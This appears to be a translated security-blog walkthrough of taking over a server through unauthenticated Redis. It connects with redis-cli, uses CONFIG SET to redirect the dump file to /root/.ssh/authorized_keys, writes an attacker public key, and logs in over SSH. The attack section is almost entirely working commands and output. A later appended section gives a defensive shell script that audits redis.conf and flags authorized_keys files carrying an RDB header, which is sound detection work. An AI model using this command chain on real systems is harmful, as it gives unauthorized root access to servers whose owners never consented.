Redis Unauthorized Access Leading to Server Takeover


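Using an nmap scan, we find that the service on one of the ports is Redis; we can then check whether it allows unauthorized access!

    First, install the Redis tools with the following command:

~# apt-get install redis-tools


Then use the following command to check whether it allows unauthorized access:


~# redis-cli -h 10.198.131.1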

10.198.131.1:6379>


We can then use passwordless login to carry out the attack:

    Generate a public key:


~/.ssh# ssh-keygen -t rsa


~/.ssh# cat id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn 


~/.ssh#


Write the public key to the remote server:


~/.ssh# redis-cli -h 10.198.131.1


10.198.131.1:6379> CONFIG SET dir /root/.ssh/

OK

10.198.131.1:6379> CONFIG SET dbfilename authorized_keys

OK

10.198.131.1:6379> set xxxx "nnnssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn [email protected]"

OK

10.198.131.1:6379> save

OK

10.198.131.1:6379> exit


 Log in remotely over ssh:

~/.ssh# ssh 10.198.131.1
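
A defender-side check for the conditions this walkthrough depends on, as an added example that is not part of the original article: `audit_redis_conf` flags the redis.conf settings that leave an instance reachable without a password and with CONFIG available, and `has_rdb_header` detects an authorized_keys file that was written by a Redis SAVE. The function names, finding labels and sample files are assumptions constructed for the illustration, and the audit reads only the four directives shown.

```shell
#!/bin/sh
# Added example (not from the original article). Function names and finding
# labels are hypothetical; the sample files below are constructed.

# Print one finding per line for settings that leave the chain above reachable.
audit_redis_conf() {
    awk '
    { key = tolower($1) }
    key == "bind" { bind = 1; nonloop = 0          # last bind line wins
        for (i = 2; i <= NF; i++) { a = $i; sub(/^-/, "", a)
            if (a !~ /^(127\.|::1$|localhost$)/) nonloop = 1 } }
    key == "protected-mode" { pm = tolower($2) }
    key == "requirepass"    { pass = $2 }
    key == "rename-command" && toupper($2) == "CONFIG" { renamed = 1 }
    END {
        if (!bind)        print "bind-missing"
        else if (nonloop) print "bind-nonloopback"
        if (pm == "no")   print "protected-mode-off"
        if (pass == "" || pass == "\"\"") print "no-requirepass"
        if (!renamed)     print "config-not-renamed"
    }' "$1"
}

# True if the file starts with the RDB magic "REDIS", i.e. it was written by
# a Redis SAVE rather than by an administrator or ssh-copy-id.
has_rdb_header() {
    [ "$(head -c 5 "$1" 2>/dev/null)" = "REDIS" ]
}

demo=$(mktemp -d); trap 'rm -rf "$demo"' EXIT

cat > "$demo/weak.conf" <<'EOF'
bind 0.0.0.0
protected-mode no
EOF
cat > "$demo/hardened.conf" <<'EOF'
bind 127.0.0.1 -::1
protected-mode yes
requirepass constructed-sample-password
rename-command CONFIG ""
EOF
printf 'REDIS0009\nssh-rsa AAAA...constructed\n' > "$demo/tampered_keys"
printf 'ssh-rsa AAAA...constructed admin\n' > "$demo/clean_keys"

echo "weak.conf:";     audit_redis_conf "$demo/weak.conf"
echo "hardened.conf:"; audit_redis_conf "$demo/hardened.conf"
for f in tampered_keys clean_keys; do
    if has_rdb_header "$demo/$f"; then echo "$f: RDB header found"; else echo "$f: ok"; fi
done
```

Point `audit_redis_conf` at the live redis.conf and `has_rdb_header` at each account's authorized_keys. The write to /root/.ssh/ shown above also requires the Redis process to run as root, which the config file does not reveal.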


This article was first published on the WeChat official account 飓风网络安全: Redis Unauthorized Access Leading to Server Takeover
